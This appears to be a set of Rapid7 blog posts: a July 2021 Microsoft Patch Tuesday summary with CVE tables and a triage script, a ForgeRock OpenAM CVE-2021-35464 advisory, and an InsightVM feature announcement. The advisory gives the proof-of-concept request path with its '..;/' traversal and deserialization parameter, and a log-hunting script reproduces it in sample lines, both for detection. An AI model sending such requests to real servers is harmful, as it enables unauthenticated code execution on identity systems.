Microsoft has patched another 117 CVEs, returning to volumes seen in early 2021 and most of 2020. It would appear that the recent trend of approximately 50 vulnerability fixes per month was not indicative of a slowing pace. This month there were 13 vulnerabilities rated Critical, with nearly all of the rest rated Important. Thankfully, none of the updates published today require additional steps to remediate, so administrators should be able to rely on their normal patching process. Once CVE-2021-34527 has been remediated, priority should be to patch public-facing DNS and Exchange servers, followed by workstations, SharePoint servers, and finally Office applications.

It seems like the PrintNightmare is nearly over. While the past two weeks have been a frenzy for the security community there has been no new information since the end of last week when Microsoft made a final revision to their guidance on CVE-2021-34527. If you haven’t patched this yet, this is your daily reminder. For further details please see our blog on the topic.

Multiple Critical DNS Vulnerabilities Patched

Administrators should focus their efforts on the 11 vulnerabilities in Windows DNS server to reduce the most risk. The two most important of these vulnerabilities are CVE-2021-34494 and CVE-2021-33780. Exploitation of either of these vulnerabilities would result in Remote Code Execution with SYSTEM privileges without any user interaction via the network. Given the network exposure of DNS servers these vulnerabilities could prove to be troublesome if an exploit were to be developed. Microsoft lists CVE-2021-33780 as “Exploitation More Likely” so it may only be a matter of time before attackers attempt to make use of these flaws.

New Exchange Updates Available

Only 4 of the 7 Exchange CVEs being disclosed this month are new. The two most severe vulnerabilities were patched back in April and were mistakenly not disclosed. This means that if you applied the April 2021 updates you will not need to take any action for CVE-2021-34473, CVE-2021-34523, or CVE-2021-33766. Of the 4 newly patched vulnerabilities, the most notable is CVE-2021-31206, a remote code execution flaw discovered in the recent Pwn2Own competition.

Scripting Engine Exploited in the Wild

Exploitation of CVE-2021-34448 has been observed in the wild by researchers. There are no details on the frequency or spread of this exploit. This vulnerability requires the user to visit a link to download a malicious file. As with other vulnerabilities that require user interaction, strong security hygiene is the first line of defense.

Summary Tables

Here are this month’s patched vulnerabilities split by the product family.

Apps Vulnerabilities

| CVE | Title | Exploited | Disclosed | CVSS3 | FAQ |
|---|---|---|---|---|---|
| CVE-2021-33753 | Microsoft Bing Search Spoofing Vulnerability | No | No | 4.7 | Yes |

Developer Tools Vulnerabilities

| CVE | Title | Exploited | Disclosed | CVSS3 | FAQ |
|---|---|---|---|---|---|
| CVE-2021-34528 | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No |
| CVE-2021-34529 | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-34477 | Visual Studio Code .NET Runtime Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-33767 | Open Enclave SDK Elevation of Privilege Vulnerability | No | No | 8.2 | Yes |
| CVE-2021-34479 | Microsoft Visual Studio Spoofing Vulnerability | No | No | 7.8 | No |

Exchange Server Vulnerabilities

| CVE | Title | Exploited | Disclosed | CVSS3 | FAQ |
|---|---|---|---|---|---|
| CVE-2021-34473 | Microsoft Exchange Server Remote Code Execution Vulnerability | No | Yes | 9.1 | No |
| CVE-2021-31206 | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 7.6 | Yes |
| CVE-2021-31196 | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 7.2 | No |
| CVE-2021-34523 | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | Yes | 9 | No |
| CVE-2021-33768 | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes |
| CVE-2021-34470 | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes |
| CVE-2021-33766 | Microsoft Exchange Information Disclosure Vulnerability | No | No | 7.3 | Yes |

Microsoft Dynamics Vulnerabilities

| CVE | Title | Exploited | Disclosed | CVSS3 | FAQ |
|---|---|---|---|---|---|
| CVE-2021-34474 | Dynamics Business Central Remote Code Execution Vulnerability | No | No | 8 | Yes |

Microsoft Office Vulnerabilities

| CVE | Title | Exploited | Disclosed | CVSS3 | FAQ |
|---|---|---|---|---|---|
| CVE-2021-34452 | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-34517 | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 5.3 | No |
| CVE-2021-34520 | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.1 | No |
| CVE-2021-34467 | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.1 | No |
| CVE-2021-34468 | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.1 | Yes |
| CVE-2021-34519 | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes |
| CVE-2021-34469 | Microsoft Office Security Feature Bypass Vulnerability | No | No | 8.2 | Yes |
| CVE-2021-34451 | Microsoft Office Online Server Spoofing Vulnerability | No | No | 5.3 | Yes |
| CVE-2021-34501 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-34518 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes |

SQL Server Vulnerabilities

| CVE | Title | Exploited | Disclosed | CVSS3 | FAQ |
|---|---|---|---|---|---|
| CVE-2021-31984 | Power BI Remote Code Execution Vulnerability | No | No | 7.6 | Yes |

System Center Vulnerabilities

| CVE | Title | Exploited | Disclosed | CVSS3 | FAQ |
|---|---|---|---|---|---|
| CVE-2021-34464 | Microsoft Defender Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-34522 | Microsoft Defender Remote Code Execution Vulnerability | No | No | 7.8 | Yes |

Windows Vulnerabilities

| CVE | Title | Exploited | Disclosed | CVSS3 | FAQ |
|---|---|---|---|---|---|
| CVE-2021-33772 | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No |
| CVE-2021-34490 | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No |
| CVE-2021-33744 | Windows Secure Kernel Mode Security Feature Bypass Vulnerability | No | No | 5.3 | No |
| CVE-2021-33763 | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes |
| CVE-2021-34454 | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes |
| CVE-2021-33761 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-33773 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34445 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-33743 | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34493 | Windows Partition Management Driver Elevation of Privilege Vulnerability | No | No | 6.7 | No |
| CVE-2021-33740 | Windows Media Remote Code Execution Vulnerability | No | No | 7.8 | No |
| CVE-2021-34458 | Windows Kernel Remote Code Execution Vulnerability | No | No | 9.9 | Yes |
| CVE-2021-34508 | Windows Kernel Remote Code Execution Vulnerability | No | No | 8.8 | No |
| CVE-2021-33771 | Windows Kernel Elevation of Privilege Vulnerability | Yes | No | 7.8 | No |
| CVE-2021-31961 | Windows InstallService Elevation of Privilege Vulnerability | No | No | 6.1 | Yes |
| CVE-2021-34450 | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8.5 | Yes |
| CVE-2021-33758 | Windows Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No |
| CVE-2021-33755 | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.3 | No |
| CVE-2021-34466 | Windows Hello Security Feature Bypass Vulnerability | No | No | 5.7 | Yes |
| CVE-2021-34438 | Windows Font Driver Host Remote Code Execution Vulnerability | No | No | 7.8 | No |
| CVE-2021-34455 | Windows File History Service Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-33774 | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No |
| CVE-2021-33759 | Windows Desktop Bridge Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34525 | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | No |
| CVE-2021-34461 | Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34488 | Windows Console Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-33784 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34462 | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7 | No |
| CVE-2021-34459 | Windows AppContainer Elevation Of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-33785 | Windows AF_UNIX Socket Provider Denial of Service Vulnerability | No | No | 7.5 | No |
| CVE-2021-33779 | Windows ADFS Security Feature Bypass Vulnerability | No | Yes | 8.1 | Yes |
| CVE-2021-34491 | Win32k Information Disclosure Vulnerability | No | No | 5.5 | Yes |
| CVE-2021-34449 | Win32k Elevation of Privilege Vulnerability | No | No | 7 | No |
| CVE-2021-34509 | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes |
| CVE-2021-34460 | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34510 | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34512 | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34513 | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-33751 | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7 | No |
| CVE-2021-34521 | Raw Image Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-34439 | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No |
| CVE-2021-34503 | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No |
| CVE-2021-33760 | Media Foundation Information Disclosure Vulnerability | No | No | 5.5 | Yes |
| CVE-2021-31947 | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-33775 | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-33776 | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-33777 | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-33778 | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-34489 | DirectWrite Remote Code Execution Vulnerability | No | No | 7.8 | Yes |
| CVE-2021-33781 | Active Directory Security Feature Bypass Vulnerability | No | Yes | 8.1 | No |

Windows ESU Vulnerabilities

| CVE | Title | Exploited | Disclosed | CVSS3 | FAQ |
|---|---|---|---|---|---|
| CVE-2021-31183 | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No |
| CVE-2021-33757 | Windows Security Account Manager Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | Yes |
| CVE-2021-33783 | Windows SMB Information Disclosure Vulnerability | No | No | 6.5 | Yes |
| CVE-2021-34507 | Windows Remote Assistance Information Disclosure Vulnerability | No | No | 6.5 | Yes |
| CVE-2021-34457 | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes |
| CVE-2021-34456 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34527 | Windows Print Spooler Remote Code Execution Vulnerability | Yes | Yes | 8.8 | Yes |
| CVE-2021-34497 | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes |
| CVE-2021-34447 | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes |
| CVE-2021-33786 | Windows LSA Security Feature Bypass Vulnerability | No | No | 8.1 | Yes |
| CVE-2021-33788 | Windows LSA Denial of Service Vulnerability | No | No | 7.5 | No |
| CVE-2021-33764 | Windows Key Distribution Center Information Disclosure Vulnerability | No | No | 5.9 | Yes |
| CVE-2021-34500 | Windows Kernel Memory Information Disclosure Vulnerability | No | No | 6.3 | Yes |
| CVE-2021-31979 | Windows Kernel Elevation of Privilege Vulnerability | Yes | No | 7.8 | No |
| CVE-2021-34514 | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-33765 | Windows Installer Spoofing Vulnerability | No | No | 6.2 | No |
| CVE-2021-34511 | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34446 | Windows HTML Platforms Security Feature Bypass Vulnerability | No | No | 8 | No |
| CVE-2021-34496 | Windows GDI Information Disclosure Vulnerability | No | No | 5.5 | Yes |
| CVE-2021-34498 | Windows GDI Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-33749 | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes |
| CVE-2021-33750 | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes |
| CVE-2021-33752 | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes |
| CVE-2021-33756 | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes |
| CVE-2021-34494 | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes |
| CVE-2021-33780 | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes |
| CVE-2021-33746 | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8 | No |
| CVE-2021-33754 | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8 | No |
| CVE-2021-34442 | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes |
| CVE-2021-34444 | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | Yes |
| CVE-2021-34499 | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | No |
| CVE-2021-33745 | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | Yes |
| CVE-2021-34492 | Windows Certificate Spoofing Vulnerability | No | Yes | 8.1 | No |
| CVE-2021-33782 | Windows Authenticode Spoofing Vulnerability | No | No | 5.5 | No |
| CVE-2021-34504 | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No |
| CVE-2021-34516 | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No |
| CVE-2021-34448 | Scripting Engine Memory Corruption Vulnerability | Yes | No | 6.8 | Yes |
| CVE-2021-34441 | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No |
| CVE-2021-34440 | GDI+ Information Disclosure Vulnerability | No | No | 5.5 | Yes |
| CVE-2021-34476 | Bowser.sys Denial of Service Vulnerability | No | No | 7.5 | No |

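The summary tables above are flat rows of "CVE Title Exploited Disclosed CVSS3 FAQ", and the post's guidance is an ordering by product (PrintNightmare first, then public-facing DNS and Exchange, then workstations, SharePoint, Office). The following is an added example, not code from the post or from Rapid7, that parses rows in that exact format and emits a triage order. Its tiering rule keys on words in the CVE titles (a heuristic I chose, not Microsoft's product taxonomy), and it pushes anything marked "Exploited = Yes" ahead of its tier, which is my addition on top of the post's product ordering. The sample rows are copied from the tables above; the parser refuses malformed lines rather than silently dropping an advisory.

```python
import re
from dataclasses import dataclass

# One table row as printed in the post: "<CVE> <title words...> <Yes|No> <Yes|No> <cvss> <Yes|No>".
ROW_RE = re.compile(
    r"^(CVE-\d{4}-\d+)\s+(.+?)\s+(Yes|No)\s+(Yes|No)\s+(\d+(?:\.\d+)?)\s+(Yes|No)$"
)

# Sample input copied from the tables in this post (a subset of the July 2021 rows).
SAMPLE_ROWS = """\
CVE-2021-34527 Windows Print Spooler Remote Code Execution Vulnerability Yes Yes 8.8 Yes
CVE-2021-34494 Windows DNS Server Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-33780 Windows DNS Server Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability No Yes 9.1 No
CVE-2021-31206 Microsoft Exchange Server Remote Code Execution Vulnerability No No 7.6 Yes
CVE-2021-33771 Windows Kernel Elevation of Privilege Vulnerability Yes No 7.8 No
CVE-2021-34448 Scripting Engine Memory Corruption Vulnerability Yes No 6.8 Yes
CVE-2021-34458 Windows Kernel Remote Code Execution Vulnerability No No 9.9 Yes
CVE-2021-34520 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8.1 No
CVE-2021-34452 Microsoft Word Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-33753 Microsoft Bing Search Spoofing Vulnerability No No 4.7 Yes
"""


@dataclass(frozen=True)
class Advisory:
    cve: str
    title: str
    exploited: bool   # "Exploited" column: seen in the wild
    disclosed: bool   # "Disclosed" column: publicly known before the patch
    cvss: float
    faq: bool


def parse_rows(text):
    """Parse flat table rows; raise on anything that does not match so a
    formatting glitch cannot silently drop an advisory from the triage list."""
    advisories = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"line {lineno}: not a summary-table row: {line!r}")
        cve, title, exploited, disclosed, cvss, faq = m.groups()
        advisories.append(Advisory(cve, title, exploited == "Yes",
                                   disclosed == "Yes", float(cvss), faq == "Yes"))
    return advisories


def tier(adv):
    """Product tier following the post's recommended order (heuristic on title words):
    0 PrintNightmare, 1 public-facing DNS/Exchange servers, 2 everything else
    (workstation components), 3 SharePoint, 4 Office applications."""
    t = adv.title
    if adv.cve == "CVE-2021-34527":
        return 0
    if "DNS Server" in t or "Exchange" in t:
        return 1
    if "SharePoint" in t:
        return 3
    if any(app in t for app in ("Word", "Excel", "Office")):
        return 4
    return 2


def sort_key(adv):
    # Exploited-in-the-wild first (my addition), then the post's product tier,
    # then publicly disclosed, then higher CVSS; CVE id breaks remaining ties.
    return (not adv.exploited, tier(adv), not adv.disclosed, -adv.cvss, adv.cve)


def prioritize(text):
    """Return advisories in recommended remediation order."""
    return sorted(parse_rows(text), key=sort_key)


if __name__ == "__main__":
    for rank, adv in enumerate(prioritize(SAMPLE_ROWS), 1):
        flags = ("ITW " if adv.exploited else "") + ("disclosed " if adv.disclosed else "")
        print(f"{rank:2d}. {adv.cve}  tier={tier(adv)}  cvss={adv.cvss}  {flags}{adv.title}")
```

Feed it the full tables (one row per line, header lines removed) to get a complete ordering; the tier function is the place to encode your own exposure knowledge, for example demoting DNS servers that are not internet-facing in your environment.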
Summary Graphs

[Summary graph images from the original post are not reproduced here.]

ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464): What You Need To Know

Post Syndicated from boB Rudis original https://blog.rapid7.com/2021/06/30/forgerock-openam-pre-auth-remote-code-execution-vulnerability-what-you-need-to-know/

ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464): What You Need To Know

On June 29, 2021, security researcher Michael Stepankin (@artsploit) posted details of CVE-2021-35464, a pre-auth remote code execution (RCE) vulnerability in ForgeRock Access Manager identity and access management software. ForgeRock front-ends web applications and remote access solutions in many enterprises.

ForgeRock has issued Security Advisory #202104 to provide information on this vulnerability and will be updating it if and when patches are available.

The weakness exists due to unsafe object deserialization via the Jato framework, with a disturbingly diminutive proof of concept that requires a single GET/POST request for code execution:

GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>

ForgeRock versions below 7.0 running on Java 8 are vulnerable, and the weakness also exists in unpatched versions of the Open Identity Platform’s fork of OpenAM. ForgeRock/OIP installations running on Java 9 or higher are unaffected.

As of July 29, 2021 there are no patches for existing versions of ForgeRock Access Manager. Organizations must either upgrade to version 7.x or apply one of the following workarounds:

Option 1

Disable the VersionServlet mapping by commenting out the following section in the AM web.xml file (located in the /path/to/tomcat/webapps/openam/WEB-INF directory):

  <servlet-mapping>        
     <servlet-name>VersionServlet</servlet-name>       
     <url-pattern>/ccversion/*</url-pattern>   
  </servlet-mapping>

To comment out the above section, apply the following changes to the web.xml file:

<!--  
  <servlet-mapping>        
     <servlet-name>VersionServlet</servlet-name>       
     <url-pattern>/ccversion/*</url-pattern>   
  </servlet-mapping>
-->

Option 2

Block access to the ccversion endpoint using a reverse proxy or other method. On Apache Tomcat, ensure that access rules cannot be bypassed using known path traversal issues: Tomcat path traversal via reverse proxy mapping.

The upgrades remove the vulnerable /ccversion HTTP endpoint along with other HTTP paths that used the vulnerable Jato framework.

As of Tuesday, June 29, 2021, Rapid7 Labs has been able to identify just over 1,000 internet-facing systems that appear to be using ForgeRock’s OpenAM solution.

All organizations running ForgeRock OpenAM 7.0.x or lower (or using the latest release of the Open Identity Platform’s fork of OpenAM) are urged to prioritize upgrading or applying the mitigations within an accelerated patch window if possible, and at the very least within the 30-day window if you are following the typical 30-60-90 day patch criticality cadence. Furthermore, organizations that are monitoring web application logs and OpenAM server logs should look for anomalous GET or POST request volume to HTTP path endpoints that include /ccversion in them.
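One practical detail when hunting for /ccversion requests, as the Option 2 caveat above implies, is that a reverse proxy may see a path such as /openam/oauth2/..;/ccversion/Version (the shape of the published proof of concept) and not recognise it as the ccversion endpoint, because Tomcat strips ";…" path parameters and then resolves the "..". The following added example (mine, not Rapid7's or ForgeRock's tooling) normalises request targets the way Tomcat would before matching, counts matches per client, and flags the jato.pageSession parameter the advisory names. The access-log lines are constructed for this example in combined-log style with documentation IP ranges; the payload value is a placeholder.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). The payload in the
# third line is a placeholder string, not a serialized object.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Jun/2021:10:01:02 +0000] "GET /openam/XUI/ HTTP/1.1" 200 512
203.0.113.10 - - [30/Jun/2021:10:01:03 +0000] "GET /openam/ccversion/Version HTTP/1.1" 200 128
198.51.100.7 - - [30/Jun/2021:10:02:11 +0000] "GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=PLACEHOLDER HTTP/1.1" 500 0
198.51.100.7 - - [30/Jun/2021:10:02:12 +0000] "POST /openam/oauth2/%2e%2e;/ccversion/Version HTTP/1.1" 500 0
192.0.2.5 - - [30/Jun/2021:10:03:00 +0000] "GET /openam/json/authenticate HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_path(target):
    """Approximate the path Tomcat dispatches on: drop the query string,
    URL-decode, strip ';...' path parameters from every segment, then
    resolve '.' and '..'. This is what defeats the '..;/' obfuscation."""
    path = unquote(target.split("?", 1)[0])
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]   # Tomcat treats ';key=value' as path parameters
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def is_ccversion_request(target):
    return "/ccversion" in normalize_path(target)


def has_page_session(target):
    query = target.split("?", 1)[1] if "?" in target else ""
    return "jato.pageSession=" in unquote(query)


def analyze(log_text, volume_threshold=2):
    """Return (hits, noisy_sources). hits: one finding per request that reaches
    /ccversion after normalisation; noisy_sources: client IPs with at least
    volume_threshold such requests, the 'anomalous volume' the advisory asks for."""
    hits = []
    per_ip = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if not is_ccversion_request(target):
            continue
        normalized = normalize_path(target)
        per_ip[m.group("ip")] += 1
        hits.append({
            "ip": m.group("ip"),
            "method": m.group("method"),
            "status": m.group("status"),
            "raw": target,
            "normalized": normalized,
            # raw path differs from the Tomcat-normalised one: traversal/obfuscation
            "obfuscated": unquote(target.split("?", 1)[0]) != normalized,
            "deserialization_param": has_page_session(target),
        })
    noisy = sorted(ip for ip, n in per_ip.items() if n >= volume_threshold)
    return hits, noisy


if __name__ == "__main__":
    found, sources = analyze(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["method"], h["raw"], "->", h["normalized"],
              "obfuscated" if h["obfuscated"] else "", "jato.pageSession" if h["deserialization_param"] else "")
    print("high-volume sources:", sources)
```

A request whose raw path does not contain ccversion but whose normalised path does is worth more attention than plain volume: legitimate clients have no reason to reach the version servlet through a path-parameter traversal. The same normalisation belongs in any proxy-side block rule for Option 2, otherwise the rule matches only the unobfuscated form.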

For individual vulnerability analysis, see AttackerKB.

This blog post will be updated with new information as warranted.

Header image photo by Hannah Gibbs on Unsplash

InsightVM Release Announcement: Global Dashboard Filters

Post Syndicated from Dane Grace original https://blog.rapid7.com/2021/06/23/insightvm-release-announcement-globally-dashboard-filters/

InsightVM Release Announcement: Global Dashboard Filters

InsightVM users have been able to create dashboards, add different visualizations in the form of cards and apply filters to these cards. Rapid7 also provided dashboard templates which enabled users to create views focusing on scenarios such as Microsoft’s Patch Tuesday, identifying and assessing Remote assets, highlighting changes in their environment in the last 30 days and many more.

Before today, you would have to apply queries to individual cards to focus these visualizations on particular assets or vulnerabilities — like focusing all of the cards in a dashboard on servers running Ubuntu. InsightVM provides an easy and powerful means to create these filters, but this was cumbersome if a dashboard contained numerous cards.

This is why we’re happy to announce the release of the ability to apply a query to a dashboard and all of the cards will now adjust the results accordingly. To illustrate this, let’s consider a hypothetical InsightVM user named Dana.

Dana is a security engineer at a rapidly expanding, global organization. This company regularly adds new offices around the world. Every office requires new servers and networks, and these assets need to be secured.

Dana’s first task when a new office is acquired is to create a dashboard for each new location using the Significant Changes in the Past 30 Days template. She finds this helps her keep up with changes in the risk posture of their environments. However, every time she creates one of these dashboards, she needs to add a filter to each of the 14 cards to focus on the office for which it’s intended. This task can take up to an hour, which is time she would rather spend on securing her environment.

This release allows Dana to build a query that filters assets for the new office, create the dashboard from the template, and apply the query to the dashboard. All of the cards will focus on the intended location. This whole process takes about five minutes as opposed to 30 minutes, and she is now free to turn her attention back to remediating vulnerabilities.

It’s worth noting that Dana is still able to filter cards, but the introduction of global dashboard filtering means that drilling into a specific view is shaped by the filters applied in the views that lead to it. One can think of this as nested scoping of views within InsightVM.

Nested scoping

Let’s lean on our previous example with Dana. She wants to create a view that accounts for all of the Windows 10 assets in their environment.

She creates a new dashboard using the Significant Changes in the Last 30 Days template and applies a dashboard query that filters for all Windows 10 assets. All of the cards in that dashboard will now reflect the results from that query.


Dana then navigates to the expanded view of the Total Asset Trends card. The results here would be filtered by the card query introduced by the template and the dashboard filter introduced by the user.


This view can further be refined by loading a query at the card level. In this example, let’s suppose Dana is interested in ICMP vulnerabilities and loads a query that filters for this.


When Dana navigates to one of the assets listed in this view, the result will respect all of the enclosing filters. In this example, that would include: the dashboard template filter, the dashboard filter and the card query — that is, the ICMP vulnerabilities on a Windows 10 asset added within the last 30 days.


You can see that these changes provide the ability to greatly focus views into your environment.
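To make the nested-scoping semantics concrete, here is an added example (mine, not InsightVM code, and not the product's query language) that models the walkthrough above: the template scope, the dashboard scope and the card scope are predicates that combine conjunctively, so each level can only narrow what the level above already selected. The asset inventory, hostnames and finding names are constructed for the example.

```python
from dataclasses import dataclass
from datetime import date, timedelta


@dataclass(frozen=True)
class Asset:
    hostname: str
    os: str
    first_seen: date
    findings: frozenset  # names of open vulnerability findings (constructed)


# Constructed sample inventory; the "today" is fixed so the example is reproducible.
TODAY = date(2021, 6, 23)
INVENTORY = [
    Asset("ws-01", "Windows 10", TODAY - timedelta(days=3),
          frozenset({"ICMP timestamp response", "SMBv1 enabled"})),
    Asset("ws-02", "Windows 10", TODAY - timedelta(days=90),
          frozenset({"ICMP timestamp response"})),
    Asset("srv-01", "Ubuntu 20.04", TODAY - timedelta(days=5),
          frozenset({"ICMP timestamp response"})),
    Asset("ws-03", "Windows 10", TODAY - timedelta(days=10),
          frozenset({"SMBv1 enabled"})),
]


# Each scope is a predicate over an asset.
def added_within(days):
    return lambda a: (TODAY - a.first_seen).days <= days


def os_is(name):
    return lambda a: a.os == name


def has_finding_matching(keyword):
    return lambda a: any(keyword.lower() in f.lower() for f in a.findings)


def apply_scopes(assets, *scopes):
    """Nested scoping: an asset is visible only if every enclosing scope admits it
    (template AND dashboard AND card). Order of the scopes does not matter."""
    return [a for a in assets if all(s(a) for s in scopes)]


def walkthrough():
    template = added_within(30)              # "Significant Changes in the Last 30 Days"
    dashboard = os_is("Windows 10")          # dashboard-level filter applied by Dana
    card = has_finding_matching("ICMP")      # query loaded into one card
    names = lambda assets: [a.hostname for a in assets]
    return {
        "dashboard": names(apply_scopes(INVENTORY, template, dashboard)),
        "card": names(apply_scopes(INVENTORY, template, dashboard, card)),
        # A card query cannot reach outside the dashboard scope: asking for Ubuntu
        # inside a Windows 10 dashboard yields nothing rather than widening the view.
        "card_cannot_widen": names(apply_scopes(INVENTORY, template, dashboard,
                                                os_is("Ubuntu 20.04"))),
    }


if __name__ == "__main__":
    for level, hosts in walkthrough().items():
        print(f"{level}: {hosts}")
```

The last entry is the point that trips people up after this change: a saved query loaded into a card is evaluated inside the dashboard's scope, so a card can never show an asset the dashboard filter excluded.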

Changes in the Dashboard Card Filtering Experience

Readers familiar with the previous card filtering experience will notice that we loaded a query into this example, but there was no in-card query builder. The addition of nested scoping complicates the filtering experience and as Spiderman’s Uncle Ben once said, “With great power comes great responsibility.”

We’ve changed the experience so that customers create and save queries in the query builder and then load those into cards, rather than building ad hoc queries inside the card, because we found that ad hoc card queries caused confusion when a scope was refined further on top of several earlier scope constraints.

While we understand that this change will require some adjustments to your workflows, we are confident that the additional functionality of globally filtered dashboards is well worth the effort.

Attack Surface Analysis Part 3: Red and Purple Teaming

Post Syndicated from Jeffrey Gardner original https://blog.rapid7.com/2021/06/22/attack-surface-analysis-part-3-red-and-purple-teaming/

Part 3: Red and Purple Teaming


